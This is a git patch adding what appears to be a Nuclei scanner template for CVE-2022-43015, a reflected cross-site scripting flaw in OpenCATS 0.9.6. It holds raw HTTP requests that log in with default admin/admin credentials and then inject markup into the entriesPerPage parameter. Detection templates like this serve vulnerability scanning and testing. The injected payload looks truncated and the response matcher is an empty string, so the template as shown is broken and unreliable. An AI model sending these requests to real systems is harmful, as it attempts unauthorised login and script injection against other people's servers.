From 5955a1e693fc2316f15f6369cc733dfdb37e0e65 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Tue, 25 Oct 2022 00:25:26 +0530 Subject: [PATCH] Create CVE-2022-43015.yaml --- cves/2022/CVE-2022-43015.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-43015.yaml diff --git a/cves/2022/CVE-2022-43015.yaml b/cves/2022/CVE-2022-43015.yaml new file mode 100644 index 0000000000..7c5de65cf8 --- /dev/null +++ b/cves/2022/CVE-2022-43015.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-43015 + +info: + name: OpenCATS - Cross Site Scripting + author: arafatansari + severity: medium + description: | + OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43015 + tags: xss,cve,2022 + +requests: + - raw: + - | + POST /index.php?m=login&a=attemptLogin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin + + - | + GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)">%20&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - ''